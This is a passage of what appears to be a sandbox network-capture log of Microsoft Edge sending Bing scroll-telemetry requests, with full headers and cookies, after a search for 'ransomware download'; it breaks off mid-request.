x-cdn-traceid: 0.98777b5c.1709220737.b3211e8
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220731982%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220731982%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 89D884D7B110423EB12B18A920A63AAC Ref B: LON04EDGE0713 Ref C: 2024-02-29T15:32:19Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220739.b321e01
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1079
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EB4521D251074452A5854458846F24B2 Ref B: LON04EDGE1021 Ref C: 2024-02-29T15:32:20Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:20 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220740.b3223c6
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220734685%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220734685%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3BF9BE09AEEE4936B532941F9AA2F7BF Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:32:21Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:21 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220741.b32270f
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735044%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735236%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735367%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735431%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736183%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736275%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736578%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735044%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735236%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735367%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220735431%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736183%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736275%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220736578%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2A3C2959996B4C099E3F09DDEF647C8C Ref B: LON04EDGE1021 Ref C: 2024-02-29T15:32:23Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:23 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220743.b323175
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 715AF78A1EF145B094E6D6C22073A8C5 Ref B: LTSEDGE1411 Ref C: 2024-02-29T15:32:24Z
date: Thu, 29 Feb 2024 15:32:24 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220744.b32388f
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220737244%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220737619%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738104%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738172%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738235%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738670%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738892%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220737244%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220737619%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738104%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738172%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738235%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738670%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220738892%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 65e0a38a11ef46e2af8c515c5e56bd63
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-2X8VmrolopU3ZfjGw0lgBhoFZf5T2mr2YuMxSNI7iKs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: AEEF74FEA2174D2799A6292DDBE7738C Ref B: LTSEDGE0821 Ref C: 2024-02-29T15:32:26Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:26 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:26 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220746.b3240ab
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220739355%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220739987%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220740133%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET 